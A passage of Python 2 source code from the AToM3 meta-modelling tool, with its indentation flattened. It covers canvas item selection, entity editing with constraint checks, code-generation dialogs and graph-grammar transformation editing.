ASGList = metaModelASG.mergedASG[:] + [metaModelASG]
stringList = []
for ASG in ASGList:
stringList.append( ASG.__class__.__name__ )
title = 'Choose Meta-Model'
actionLabel = 'Select'
index = self.popupMenuCreator.listChoicePopup( title,stringList,actionLabel )
# Invalid result? Quit
if( index == 0 ): return
# Valid result? Use this metaModelASG then.
metaModelASG = ASGList[ index-1 ]
ATOM3TypeDialog(self, metaModelASG )
"""
def showConsole(self):
""" Shows the console, if it is hidden """
if( self.debugConsole.showWindow() == -1 ):
self.debugConsole = DebugConsole(self)
self.debugConsole.showWindow()
if( self.console.showWindow() == -1 ):
self.console = Console(self)
self.console.showWindow()
def find_visible_closest (self, x, y, canvas, limit=50,ignore=None):
"""
Returns the closest item to (x, y) which is visible.
If the item has 4 or more coordinates, the distance from (x, y) to each segment
defined by consecutive coordinate pairs (x1, y1), (x2, y2) is calculated.
Added : 10 July 2002 JL
"""
# Check if a "current" item is selected, could save us some trouble
itemHandler = canvas.find_closest(x,y)
if( itemHandler and itemHandler[0] != ignore \
and self.__isItemVisible(itemHandler[0], canvas) ):
tags = canvas.gettags( itemHandler[0] )
if( "current" in tags ):
return (itemHandler[0], )
minDistance = 20000 # minimum distance
minDistItem = -1 # item with minimum distance
# items tuple with all the items within a certain region
items = canvas.find_overlapping(x-limit, y-limit, x+limit, y+limit)
segmin = None
for item in items: # get the item with minimum distance
if( self.__isItemVisible(item, canvas) and (item != ignore) ):
if canvas.type(item) == 'text':
crd = canvas.bbox(item)
else:
crd = canvas.coords(item)
ncoords = len(crd)
# Entity or link: coords = [x0,y0, x1,y1, x2,y2, ...]; segments start at indices 0, 2, 4, ...
if ncoords >=4:
for i in range(0, ncoords-3, 2):
# Check if x0 == x1 and y0 == y1, point object
if crd[i] == crd[i+2] and crd[i+1] == crd[i+3]:
distance = self.__dist(crd[i], crd[i+1], x, y) # math.sqrt(abs((crd[i]-x)*(crd[i]-x)+(crd[i+1]-y)*(crd[i+1]-y)))
# Check distance between event and the segement line described by x0,y0,x1,y1
else:
distance = self.__point2Segment(x, y, crd[i], crd[i+1], crd[i+2], crd[i+3])
if( distance < minDistance ):
# Ignore items without tags --> Probably the snap grid
tags = canvas.gettags( item )
if( len(tags) == 0 or tags[0] == 'current' ): continue
segmin = crd[i], crd[i+1], crd[i+2], crd[i+3]
minDistance = distance
minDistItem = item
# Point object
else:
distance = self.__dist(crd[0], crd[1], x, y) # math.sqrt(abs((crd[0]-x)*(crd[0]-x)+(crd[1]-y)*(crd[1]-y)))
if distance < minDistance:
segmin = crd[0], crd[1]
minDistance = distance
minDistItem = item
#print " type = ", self.UMLmodel.type(item)
#print " - coords = ", crd
#print " - dist = ", distance
#print "************************", minDistance, x, y
return (minDistItem, )
def editclass(self, x, y, itemHandler = None ):
"""
Edits the nearest class that can be found in the canvas,
UNLESS you specify an itemHandler, in which case will use that one
"""
self.cb.setEditState(None, None) # Reset edit state
dc = self.getCanvas()
# Get an itemHandler to edit...
if( itemHandler ):
ct = itemHandler
else:
# Assume we receive x,y as an event.rootx,event.rooty pair
# So must normalize to put them back in the canvas area
xx,yy = self.cb.getLastClickCoord()
ct = self.find_visible_closest(xx,yy, dc)
# Get the tag and then have fun...
tags = dc.gettags(ct)
if tags:
# try the global constraints...
if not self.editGGLabel:
res = self.ASGroot.preCondition(ASG.EDIT)
if res: # global constraint do not hold!
self.constraintViolation(res)
return
if( VisualObj.Tag2ObjMap.has_key( tags[0] ) ):
obj = VisualObj.Tag2ObjMap[tags[0]]
else:
return
if not self.editGGLabel:
res = obj.semanticObject.preCondition ( ASGNode.EDIT ) # Local preconditions...
if res:
self.constraintViolation(res)
return
self.ASGroot.preAction(ASGNode.EDIT)
obj.semanticObject.preAction ( ASGNode.EDIT )
# Position the edit box with care :D
#margin = dc.winfo_screenwidth() / 2
#if( x > margin ): x = margin
#margin = dc.winfo_screenheight() / 3
#if( y > margin ): y = margin
if(self.editGGLabel == ASG.INLHS):
extraText = "WARNING: use the attribute field OR Set to any"
elif(self.editGGLabel == ASG.INRHS):
extraText = "WARNING: use only Copy OR Specify (and not both)"
else:
extraText = ''
ma = ATOM3TypeDialog(self, obj.semanticObject, 0,
(self.setEditGGLabel ,None),topLeftCoords=[x,y],
extraText=extraText)
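# Validation pattern used below: whenever a constraint is violated, the
# previous attribute values are restored from ma.previousObject and the
# editor is re-opened via a recursive self.editclass(x, y) call.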
if ma.result_ok: # update ATOM3Appearance with the keyword change...
# Check that the GG label is unique (IMPORTANT), if in GG
if(self.editGGLabel):
currentGGlabelInt = obj.semanticObject.GGLabel.getValue()
for nodeType in self.ASGroot.listNodes.keys():
for node in self.ASGroot.listNodes[nodeType]:
if(node.GGLabel.getValue() == currentGGlabelInt):
# Woops, not a duplicate if that's ourself...
if(obj.semanticObject == node):
continue
self.constraintViolation(("Duplicate GG label: "
+str(currentGGlabelInt),""))
# restore old information
obj.semanticObject.copy(ma.previousObject)
self.editclass(x, y)
return
# Check that the keyword of the entity is still unique, if it has one.
if obj.semanticObject.keyword_:
for element in self.ASGroot.listNodes[obj.semanticObject.__class__.__name__]:
if obj.semanticObject != element and obj.semanticObject.keyword_.toString() == element.keyword_.toString(): # different elements and same keyword, so invalidate the previous editing
# it is not an error if both are None and we are in a graph-grammar rule
if obj.semanticObject.keyword_.isNone() and element.keyword_.isNone() and self.editGGLabel:
pass
else:
self.constraintViolation(("Duplicate keyword: "+element.keyword_.toString(),"")) # we should undo the editing
obj.semanticObject.copy(ma.previousObject) # restore old information
self.editclass(x, y)
return
if not self.editGGLabel:
res = obj.semanticObject.postCondition ( ASGNode.EDIT ) # if we are not in a GG rule
if res:
self.constraintViolation(res) # Present an error message
obj.semanticObject.copy(ma.previousObject) # restore old information
self.editclass(x, y) # edit again!
return
if not self.editGGLabel:
res = self.ASGroot.postCondition(ASGNode.EDIT)
if res:
self.constraintViolation(res) # Present an error message
obj.semanticObject.copy(ma.previousObject) # restore old information
self.editclass(x, y) # edit again!
return
obj.semanticObject.postAction ( ASGNode.EDIT )
self.ASGroot.postAction(ASGNode.EDIT)
# Modify the visual attributes
for attr in obj.semanticObject.generatedAttributes.keys():
types = obj.semanticObject.generatedAttributes[attr]
for t in types:
if t == 'ATOM3Appearance': # if it is appearance
appAttr = obj.semanticObject.getAttrValue( attr )
if obj.semanticObject.keyword_:
appAttr.setValue( (obj.semanticObject.keyword_.toString(), ) )
def modifyVisualAttribute( visualAttr, obj ):
"""
Text char area set to unlimited by Denis Dube, March 5, 2005
Text char area set to [80,10] by Denis Dube, Aug 24, 2004
Text char area set to [25,5] by JL, July 16, 2002
NOTE: The Kernel.GraphicEditor.SaveGFVisitor.visitAttribute() method
must use the same text character area as here for consistency
with newly created Formalisms (whose Icons are created with
the graphic editor).
"""
valueStr = obj.semanticObject.__dict__[visualAttr].toString()
obj.ModifyAttribute(visualAttr, valueStr)
# Modify also the visual attributes
for visualAttr in obj.attr_display.keys():
if self.editGGLabel== ASG.INLHS and obj.semanticObject.__dict__[visualAttr].isNone():
obj.ModifyAttribute(visualAttr, "<ANY>")
elif self.editGGLabel== ASG.INRHS: # Modified 22 July 2002, JL
if obj.semanticObject.GGset2Any.has_key(visualAttr):
if obj.semanticObject.GGset2Any[visualAttr].Copy.getValue()[1]:
obj.ModifyAttribute(visualAttr, "<COPIED>")
elif not obj.semanticObject.GGset2Any[visualAttr].Specify.getValue()[4] in ["", "\n", None]:
obj.ModifyAttribute(visualAttr, "<SPECIFIED>")
else:
modifyVisualAttribute( visualAttr, obj )
else:
modifyVisualAttribute( visualAttr, obj )
# update status bars...
if self.editGGLabel :
self.statusbar.event(StatusBar.TRANSFORMATION, StatusBar.MODIFY)
obj.drawGGLabel(self.UMLmodel)
else:
self.statusbar.event(StatusBar.MODEL, StatusBar.MODIFY)
# Store edit state, obviously everything worked out here!
# But what if a postStatechart wants to restore the old state? NP!
self.cb.setEditState(obj.semanticObject, ma.previousObject)
self.mode = self.IDLEMODE
def codeGenerationDialog( self ):
""" Now you know where the heck that code is being generated to :D """
modelPathAndFile = self.statusbar.getState(self.statusbar.MODEL)[1][0]
modelPath, modelName = os.path.split(modelPathAndFile)
modelName = modelName.split('.')[0]
if( self.ASGroot and hasattr( self.ASGroot, 'name' ) ):
if( self.ASGroot.name.getValue() == 'ERModel' ):
myText = 'The model name "ERModel" is reserved!\n\n' \
+ 'Please choose a different name'
dialog = Dialog.Dialog(None, {'title': 'Naming Error',
'text': myText,
'bitmap': '',
'default': 0,
'strings': ('Set new name','Generate anyway','Cancel')})
# Set new name...
if( dialog.num == 0 ):
self.modelAttributes()
return self.codeGenerationDialog()
# Proceed anyway
elif( dialog.num == 1): pass
#Cancel
else: return
elif( self.ASGroot.name.getValue() == '' ):
myText = 'Attempted to generate code for model with no name!\n' \
+'Please give your model a name'
dialog = Dialog.Dialog(None, {'title': 'Naming Error',
'text': myText,
'bitmap': '',
'default': 0,
'strings': ('Set name','Use '+modelName+' as name','Cancel')})
# Set new name...
if( dialog.num == 0 ):
self.modelAttributes()
return self.codeGenerationDialog()
# Proceed anyway
elif( dialog.num == 1):
self.ASGroot.name.setValue(modelName)
self.modelAttributes()
return self.codeGenerationDialog()
#Cancel
else: return
myText = ''
myText += 'In which directory shall the code be generated?:\n'
myText += 'NOTE: this directory must contain all graph_*.py files that make up the model.\n\n'
myText += 'Current model directory: ' + modelPath + '\n\n'
myText += 'Default directory: ' + self.codeGenDir + '\n\n'
myText += 'You can also choose any directory in the User Formalisms area\n'
dialog = Dialog.Dialog(None, {'title': 'Code Generation',
'text': myText,
'bitmap': '',
'default': 0,
'strings': ('Current Model Dir.','Default Dir.', 'User Formalisms','Cancel')})
# Set Code Gen. Dir to the current Model Dir.
if( dialog.num == 0 ):
oldCodeGenDir = self.codeGenDir
self.codeGenDir = os.path.normpath( modelPath )
g = self.genCode( showDialog = False )
self.codeGenDir = oldCodeGenDir
return g
# Use the Code Gen. Dir. from Options
elif( dialog.num == 1 ):
return self.genCode( showDialog = False )
# Choose a new Code Gen. Dir manually
elif( dialog.num == 2 ):
try:
pathFile = tkFileDialog.asksaveasfilename(
title="Code generation directory",
initialfile='Filename_Will_Be_Ignored',
filetypes=[("All files","*")],
initialdir=USER_MMODEL_PATH)
except:
pathFile = tkFileDialog.askopenfilename(
title="Code generation directory",
filetypes=[("Choose any file in Code Gen. Dir.", "*")]
,initialdir = USER_MMODEL_PATH )
if( pathFile ):
pathFile = os.path.split( pathFile )[0]
# Cancel
if( pathFile == '' ):
return None
oldCodeGenDir = self.codeGenDir
self.codeGenDir = os.path.normpath( pathFile )
g = self.genCode( showDialog = False )
self.codeGenDir = oldCodeGenDir
return g
# Cancel
elif( dialog.num == 3 ):
return None
def genCode(self, showDialog = True ):
"""
Generates Python code from the model information
"""
if not self.existGenerativeAttributes(): # no code to generate, model is not generative!
tkMessageBox.showerror(
"No code can be generated",
"Trying to produce code from a non-generative model",
parent = self
)
return
# Check if multiple-formalisms are being used while generating code
if(len(self.ASGroot.getEntireASGList()) > 1):
myText = "Trying to generate code in the presence of " \
+ "multiple-formalisms\n" \
+ str(self.ASGroot.getEntireASGList()) \
+ '\n\nWARNING: This will only work if the generating ' \
+ 'formalism was opened first (it appears to the left in ' \
+ 'the toolbar)'
dialog = Dialog.Dialog(None, {'title': 'Code Generation Warning',
'text': myText,
'bitmap': 'warning',
'default': 0,
'strings': ('Abort','Continue')})
if(dialog.num == 0):
return
if( showDialog ):
return self.codeGenerationDialog()
hasGraph = 0 # flag that indicates if we have a graphical attribute
cardConstObjects = []
if self.ASGroot.keyword_:
if self.console: self.console.appendText('Generating code for model '+self.ASGroot.keyword_.toString())
else:
if self.console: self.console.appendText('Generating code for model.')
for nodeType in self.ASGroot.nodeTypes: # for each node type
for UMLobject in self.ASGroot.listNodes[nodeType]: # for each object of any type
self.genCodeFor (UMLobject, cardConstObjects) # Generate code for this particular entity # in cardConstObjects, we are storing the objects with cardinality constraints
# see first if we have generative attributes...
self.genASGCode(cardConstObjects) # generate code for the ASG node
self.genButtons() # generate the file for the syntax actions
# now generate the file with the GUI model...
self.genButtonsModel()
tkMessageBox.showinfo(
"Code generated",
"Please restart AToM3 before trying to load the newly generated "
+ "formalism\n\nHINT: starting another instance of AToM3 works too",
parent = self
)
def genButtonsModel(self, ASGroot=None):
"""
Generates a model in the "Buttons" formalism with the button layout and associated actions. It is
done by executing the graph grammar createButtons.
"""
if(ASGroot == None):
ASGroot = self.ASGroot
from ButtonGenerator import ButtonGenerator
print 'NOTE: Buttons grammar bypassed by Denis Dube (denkkar@gmail.com), 2006', __file__
return ButtonGenerator(self, ASGroot)
# nameButtonBar = ASGroot.keyword_.toString()
#
# # Old path = where it will be generated by the GG, new path is where we want it
# oldMetaModelPath = os.path.join( self.codeGenDir,nameButtonBar+".py" )
# newMetaModelPath = os.path.join( self.codeGenDir,nameButtonBar+"_META.py" )
#
# # The button model already exists! Re-generate or not...?
# if( os.path.exists( newMetaModelPath ) ):
# myText = ''
# myText += 'Old buttons model detected: ' + newMetaModelPath
# myText += '\n\nDo you wish to re-generate the buttons model?'
# myText += '\n\nRe-generation is only useful if entities have been added/removed to/from your model'
#
# dialog = Dialog.Dialog(None, {'title': 'Overwrite Buttons Model?',
# 'text': myText,
# 'bitmap': '',
# 'default': 0,
# 'strings': ('Keep old model','Overwrite')})
#
# # Keep the old model
# if( dialog.num == 0 ):
# return
#
# oldGenGraphics = self.genGraphics
# self.genGraphics = 0
# if self.console: self.console.appendText('Generating file '
# +nameButtonBar+'_META.py in directory '+self.codeGenDir
# +' (User Interface file)')
# try:
# # get the graph grammar to execute from the options... (modified 29/July 2002)
# exec "from "+self.GGforCodeGen+" import *\n"
# # in self.__dict__, self.__dict__
# self.GraphGrammars = [ eval(self.GGforCodeGen+"(self)") ]
# except:
# eText = 'ERROR: Graph grammar not found (or incorrect). Tried:'
# eText += "from "+self.GGforCodeGen+" import *\n"
# eText += 'Please make sure that was the right graph grammar'
# eText += ' in AToM3 main options is selected\n\n'
# eText += 'For example: Class Diagrams and Entity Relationships have'
# eText += 'different graph grammars for generating buttons.\n'
# eText += '\nDue to error, no buttons model (*_META.py) was generated'
# print eText
# showerror('Buttons Graph Grammar', eText)
# return
#
# # get the graph grammar to execute from the options... (modified 29/July 2002)
# self.grs = GraphRewritingSys(self, self.GraphGrammars, ASGroot )
# self.grs.evaluate(stepByStep = 0, moveEntities = 0,
# execute = self.grs.SEQ_RANDOM, graphics = 0)
# # no graphics (the canvas with the model is closed!)
# self.genGraphics = oldGenGraphics
#
# # The following is ugly: to add the following header, the file generated
# # by the graph re-writing system must be read in then writed out again.
# file = open( oldMetaModelPath, 'r' )
# fileText = file.read()
# file.close()
# os.remove( oldMetaModelPath )
#
# # Header + Generated File
# file = open( newMetaModelPath, 'w+t' )
# file.write('"""\n')
# file.write("__"+ nameButtonBar+"_META.py_____________________________________________________\n")
# file.write("\n")
# file.write("Automatically generated AToM3 button model (DO NOT MODIFY DIRECTLY)\n")
# try:
# file.write("Generated by graph grammar: "
# +self.GraphGrammars[0].__class__.__name__+'\n')
# except: pass
# file.write("Author: "+USER_NAME+"\n")
# file.write("Modified: "+time.asctime()+"\n")
# file.write("__"+ len(nameButtonBar+"_META.py")*"_" +"_____________________________________________________\n")
# file.write('"""\n')
# file.write(fileText)
# file.close()
def addCopyFromLHSButton(self, GGrule):
"""
Adds a button to copy the nodes in the LHS when editing a graph grammar.
- GGrule is an object of type GGruleEdit, which contains the semantic
information of the rule being edited. A reference to this object is
kept in self.GGSemanticRule for later use in callback method copyFromLHS.
Added 20/July/2002 by JL
"""
if(self.editGGLabel == ASGNode.INRHS): # add a button to copy from LHS's
self.GGSemanticRule = GGrule
mmToolBar = Frame(self.toolBar, relief = RAISED)
b = Label(mmToolBar, text = "Transformation", fg="darkgreen",
bg="white", font = ("Helvetica",10), relief = GROOVE, padx=1)
b.pack(side = TOP, fill = X, ipady = 2)
bcopy = Button( mmToolBar, text="Copy LHS", command=self.copyFromLHS )
bcopy.pack(side=LEFT, padx=2, pady=1)
from DrawConnections import allowGenericLinks
g = Button( mmToolBar, text="Generic Links",
command=lambda s=self: allowGenericLinks(s))
g.pack(side=LEFT, padx=2, pady=1)
mmToolBar.pack(side=LEFT, fill=Y)
# Toolbar items may have changed
self.parent.update()
self.configureToolbar()
# Adds button to allow generic links between any entities
elif(self.editGGLabel == ASGNode.INLHS):
mmToolBar = Frame(self.toolBar, relief = RAISED)
b = Label(mmToolBar, text = "Transformation", fg="darkgreen",
bg="white", font = ("Helvetica",10), relief = GROOVE, padx=1)
b.pack(side = TOP, fill = X, ipady = 2)
from DrawConnections import allowGenericLinks
g = Button( mmToolBar, text="Generic Links",
command=lambda s=self: allowGenericLinks(s))
g.pack(side=LEFT, padx=2, pady=1)
# Allow separation of an association from its connecting entities
from CallbackHandlers import getSelectedItemsForDelete
ff = Button( mmToolBar, text="Isolate Association",
command=lambda s=self: getSelectedItemsForDelete(s, entityOnlyFlag=True))
ff.pack(side=LEFT, padx=2, pady=1)
mmToolBar.pack(side=LEFT, fill=Y)
# Toolbar items may have changed
self.parent.update()
self.configureToolbar()
def deleteRealEntity (self, tag, obj = None, entityOnly=False ):
"""
Deletes the entity with tag 'tag' invoking corresponding
pre and post conditions
Parameters:
tag: the tag of a graphical object
obj: the semantic object (optional), can use any value for tag...
"""
if( not obj ):
if( not VisualObj.Tag2ObjMap.has_key( tag ) ):
print "The following tag was not found, so it was probably already deleted: ", tag
return
obj = VisualObj.Tag2ObjMap[tag] # obtain the visual object
res = self.ASGroot.preCondition (ASGNode.DELETE) # Test global pre condition
if res:
self.constraintViolation(res)
return
res = obj.semanticObject.preCondition (ASGNode.DELETE) # Test local pre condition
if res:
self.constraintViolation(res)
return
self.ASGroot.preAction ( ASGNode.DELETE )
obj.semanticObject.preAction ( ASGNode.DELETE )
obj.erase(self, entityOnly=entityOnly)
# remove from ASG and from all its connected nodes...
obj.semanticObject.removeNode()
res = self.ASGroot.postCondition (ASGNode.DELETE) # Test global post condition
if res:
self.constraintViolation(res)
return
res = obj.semanticObject.postCondition (ASGNode.DELETE) # Test local post condition
if res:
self.constraintViolation(res)
return
self.ASGroot.postAction ( ASGNode.DELETE )
obj.semanticObject.postAction ( ASGNode.DELETE )
#================================================================================
#Hierarchical structure maintenance, see HierarchicalASGNode.py for more info
#================================================================================
if(obj.semanticObject.isHierarchicalNode()):
obj.semanticObject._removeNodeFromHierarchyTopLayer()
"""
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
#
#
# Above these lines, code has been created / modified by Denis Dube during the Summer of 2004
#
#
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------------------------------------------------------------
"""
def closeUnusedMetaModels(self):
"""
Closes the meta-models which do not have entities in the current model.
"""
# This method disabled by Denis - Feb 12, 2005
# It's the non-interactive method, and it does annoying things
# Ex: toolbars are now meta-models and they are of course "unused" on
# the canvas, so they get automatically closed. Yuck!!!
return
"""
MetaModels2Leave = [] # List of meta-models that we will not erase
# Search for each entity of each meta-model, to see if there is any instance, in that case, we cannot erase the mm.
for mm in self.entitiesInMetaModel.keys(): # for each opened metamodel
delete = 1
for entity in self.entitiesInMetaModel[mm]: # for each entity of that meta-model
if self.ASGroot.listNodes[entity] != []: # if we do not have any...
MetaModels2Leave.append(mm) # then we should not erase that metamodel
break
trueNames = [] # now get the name of the GUI Model that corresponds to this meta-model
for mm in MetaModels2Leave:
for mminfo in self.buttonList: # look in buttonList, because we have tuples (<frame>, <GUIName>, <MMName>, ...)
if type(mminfo) == TupleType: # Some other elements of this list are not tuples.
mmFile = mminfo[2] # get the filename
dir, fileName = os.path.split(mmFile)
mmName = fileName[:len(fileName)-6] # erase the trailing "_MM.py"
if mmName == mm:
trueNames.append(ATOM3String(mminfo[1]))
break
numMM = len(self.openMetaModels.getValue()) # now remove the meta-models, calling self.removeMetaModels
self.openMetaModels.setValue(trueNames)
self.removeMetaModels(numMM)
self.putMetaModelName()
"""
def loadTypes(self, listOfNewTypes):
"""
Adds the components of the second parameter into self.typeList, wrapping each into an ATOM3TypeInfo, and loads them
into the types dictionary.
listOfNewTypes is a list of tuples: ( 'user-friendly name', 'class name', tuple-with-parameters, may-edit-model)
"""
tl = self.typeList.getValue() # obtain the list of types...
for newType in listOfNewTypes: # for each tuple in the list...
obj = ATOM3TypeInfo(self) # wrap it into an ATOM3TypeInfo
ufname, cname, params, medt = newType # unwrap the tuple
exec "from "+cname+" import "+cname+"\n" # Modified 23 Sept 2002
className = eval(cname) # obtain the class name
objType = className() # create a new type object...
obj.setValue (newType) # sets the value to the component...
objType.createTypeGraph(self, obj.typeModel) # create the graph
tl.append(obj) # add the element to the list
if not newType in self.newTypes: # add the type in the list of newly added types...
self.newTypes.append(newType)
self.types[ufname] = ( eval(cname), tuple(params) ) # Update the types dictionary immediately
# Necessary as other types following this may use this type definition....
# self.fillDictionaryWithTypes() # call the function to add new types in the dictionary (NO LONGER NECESSARY - 23 Sept 2002)
def expandModel(self, unUsed, wx, wy):
"Opens a new ATOM3 instance to edit the model components"
x = self.UMLmodel.canvasx (wx) # convert to canvas coordinate system
y = self.UMLmodel.canvasy (wy)
ct = self.find_visible_closest(x, y, self.UMLmodel)
tags = self.UMLmodel.gettags(ct)
if tags[1][:4] == "ASG_":
tags = self.UMLmodel.gettags(ct)
if tags:
obj = VisualObj.Tag2ObjMap[tags[0]]
ma = ATOM3TypeDialog(self, obj.semanticObject, ATOM3TypeDialog.OPEN ) # edit types...
self.mode=self.IDLEMODE
def fillDictionaryWithTypes(self):
"Given an ATOM3List of ATOM3TypeInfo, extracts each object and fills a dictionary"
objList = self.typeList.getValue() # retrieve the list of ATOM3TypeList's
for obj in objList:
name, strClassName, strParams, mayEditModel = obj.getValue() # (Name, className, (param1, param2,...))
realParams = [] # Form the list of parameters
for param in strParams: # for each ATOM3String parameter
stringParam = param.toString()
rp = eval(stringParam) # de-Stringize
realParams.append(rp) # append to the list
# first import the library
exec "from "+strClassName+" import "+strClassName+"\n"
self.types[name] = ( eval(strClassName), tuple(realParams) ) # for the dictionary entry
def editEntity(self, unUsed, wx, wy):
"check the type of entity that we have to edit and do it"
x = self.UMLmodel.canvasx (wx) # convert to canvas coordinate system
y = self.UMLmodel.canvasy (wy)
ct = self.find_visible_closest(x, y, self.UMLmodel)
tags = self.UMLmodel.gettags(ct)
if tags and tags[0] != 'current': # i.e. we don't have a connection
self.editclass( x, y)
self.mode=self.IDLEMODE
def find_closest_connector(self, x, y):
"""
Finds the closest connector to the coordinate (x, y). Returns the handle of this connector or -1 if there is none.
"""
import math
connectors = self.UMLmodel.find_withtag("connector") # get tuple with all the connectors
minDistance, minconnector = 10000, -1
for connector in connectors: # iterate to look for the closest
coords = self.UMLmodel.coords(connector) # get an n-tuple with the coordinates of connector
distance = math.sqrt((x-coords[0])*(x-coords[0])+(y-coords[1])*(y-coords[1])) # distance to the first two coordinates (connectors are just a point)
if distance < minDistance:
minDistance = distance
minconnector = connector
return minconnector
def __buttonsNeeded(self, buttonsTuple):
"""
Returns true if the buttons are needed (the ASGroot is the meta-model the buttons represent or has
a merged graph).
Added 12 Nov. 2002
"""
fileName = buttonsTuple[2] # get the fileName <ddd>/<xxx>_MM
if self.ASGroot:
fName = self.ASGroot.metaModelName+"_MM.py"
if string.find(fileName, fName) != -1: return -1
for merged in self.ASGroot.mergedASG:
fName = merged.metaModelName+"_MM.py"
if string.find(fileName, fName) != -1: return -1
return 0
def clearModel(self, showDialog = True ):
"Clears the current model"
doClean = 1
st, fl = self.statusbar.getState(StatusBar.MODEL)
if( showDialog and st == StatusBar.MODIFIED ):
if tkMessageBox.askyesno(
"Model has changed...",
"Are you sure you want to clean the canvas?",
parent = self
) == 0:
doClean = 0
if( doClean and self.ASGroot ):
self.ASGroot.removeContents(self, 1)
self.statusbar.event(StatusBar.MODEL, StatusBar.CLEAR, "Nonamed")
if self.console: self.console.appendText('Clearing model')
def globalPrecondition(self, whichRoot = None ):
"""
Evaluates a global precondition, on CREATE. This method is usually called while a model is being loaded.
This API is intended to make such models more readable
"""
if whichRoot == None: # By default evaluate the preCondition on the ASGroot...
root = self.ASGroot
else:
root = whichRoot # Unless another 'root' node is passed
res= root.preCondition(ASG.CREATE)
if res:
self.constraintViolation(res)
self.mode=self.IDLEMODE
return
def globalAndLocalPostcondition(self, node, whichRoot = None):
"""
Evaluates a global and local postcondition, on CREATE. This method is usually called while a model is being loaded.
This API is intended to make such models more readable
"""
if whichRoot == None: # By default evaluate the preCondition on the ASGroot...
root = self.ASGroot
else:
root = whichRoot # Unless another 'root' node is passed
res= root.postCondition(ASG.CREATE)
if res:
self.constraintViolation(res)
self.mode=self.IDLEMODE
return
res= node.postCondition(ASG.CREATE)
if res:
self.constraintViolation(res)
self.mode=self.IDLEMODE
return
# Hacked in by Denis, 2005
#node.postAction(ASG.CREATE)
def editDialogIsOpen( self, errorString ):
""" Most transformation methods assume that no GG editing dialog is
not open when they are executed """
if( self.inGGeditDialog ):
tkMessageBox.showerror( "Failed to "+errorString+" ",
"Please close the GG editing dialog first", parent = self )
return True
return False
def editTrans(self, statusbarState = StatusBar.MODIFY, name = None ):
"""
Edits the current graph grammar
"""
if( self.editDialogIsOpen( 'edit transformation' ) ): return
# Clear out the selections
self.cb.clearSelectionDict()
# checks if there are some graph grammar being edited...
if self.EditingGraphGrammar == None:
self.EditingGraphGrammar = GraphGrammarEdit(None, self) # none
self.inGGeditDialog = True
ma = ATOM3TypeDialog(self, self.EditingGraphGrammar) # edit the GG
if ma.result_ok:
self.statusbar.event(StatusBar.TRANSFORMATION, statusbarState,
self.EditingGraphGrammar.Name.toString(), name)
self.inGGeditDialog = False
def createTrans(self):
"""
creates and edits a new graph grammar
"""
self.editTrans( StatusBar.CREATE, "Nonamed")
def genTransDocumentation(self, editAfter=True):
""" Generates documentation in latex/text form for the graph grammar """
# An open GG editing dialog somehow throws a monkey wrench so destroy it
if( self.editDialogIsOpen( 'gen transformation documentation' ) ): return
if not self.EditingGraphGrammar:
tkMessageBox.showerror(
"Couldn't generate documentation!",
"There is no transformation loaded",
parent = self
)
return
initFile = self.statusbar.getState(StatusBar.TRANSFORMATION)[1][1]
if( initFile[-10:] == '_GG_mdl.py' ): initFile = initFile[:-10]
print initFile # echo the default documentation file name
try:
fileName = tkFileDialog.asksaveasfilename(
title="Choose documentation directory",
initialfile=initFile,
filetypes=[("All files","*")],
initialdir=self.initialDirectoryDict[ 'Documentation' ])
except:
fileName = tkFileDialog.asksaveasfilename(
title="Choose documentation directory",
filetypes=[("All files","*")],
initialdir=self.initialDirectoryDict[ 'Documentation' ])
if( fileName == '' ): return
self.initialDirectoryDict[ 'Documentation' ] = os.path.split(fileName)[0]
# Save the Graph Grammar model too, just to be safe
self.saveTrans( saveAsFile = os.path.splitext( fileName )[0] )
self.EditingGraphGrammar.documentGrammar(fileName)
if(editAfter):
self.editTrans()
def genCode4Trans(self, editAfter=True):
"""
Generates code for the current graph grammar
"""
if( self.editDialogIsOpen( 'save transformation' ) ): return
if not self.EditingGraphGrammar:
tkMessageBox.showerror(
"Couldn't generate code!",
"There is no transformation loaded",
parent = self
)
return
def doCodeGen():
# Call the object's code-generating method
if self.console:
self.console.appendText('Generating code for transformation '
+self.EditingGraphGrammar.Name.toString())
self.EditingGraphGrammar.genCode()
def dialogThenCodeGen( initialDir ):
oldCodeGenDir = self.codeGenDir
try:
self.codeGenDir = tkFileDialog.asksaveasfilename(
title="Save generated code files to...",
initialfile=self.EditingGraphGrammar.Name.toString()+'_GG_exec.py',
filetypes = [('Only directory needed','*')],
initialdir=initialDir)
except:
self.codeGenDir = tkFileDialog.askopenfilename(filetypes=[
("Pick any file in directory", "*")],
title="Code generation directory",
initialdir=initialDir)
if( self.codeGenDir):
self.codeGenDir = os.path.split( self.codeGenDir)[0]
# File dialog was *NOT* cancelled
if( self.codeGenDir):
doCodeGen()
self.codeGenDir = oldCodeGenDir
myText = 'In which directory shall the code be generated?\n\n' \
+ 'Note: *ANY* directory will work\n\n' \
+ 'Code generation directory (set in AToM3 options): ' \
+ self.codeGenDir + '\n\n'
dialog = Dialog.Dialog(None, {'title': 'Code Generation',
'text': myText,
'bitmap': '',
'default': 1,
'strings': ('Code Gen. Dir', 'User Models',
'User Formalisms','Central Models',
'Central Formalisms','Cancel')})
# Set Code Gen. Dir to the current Model Dir.
if( dialog.num == 0 ):
doCodeGen()
elif( dialog.num == 1 ):
dialogThenCodeGen(USER_MODEL_PATH)
elif( dialog.num == 2 ):
dialogThenCodeGen(USER_MMODEL_PATH)
elif( dialog.num == 3 ):
dialogThenCodeGen(MODEL_PATH)
elif( dialog.num == 4 ):
dialogThenCodeGen(META_MODEL_PATH)
else:
return
if(editAfter):
self.editTrans()
def saveTrans(self, saveAsFile = None, editAfter=True ):
"""
Saves a transformation to a file,
in a similar way to saving a regular model
Updated January 26, 2005 by Denis
"""
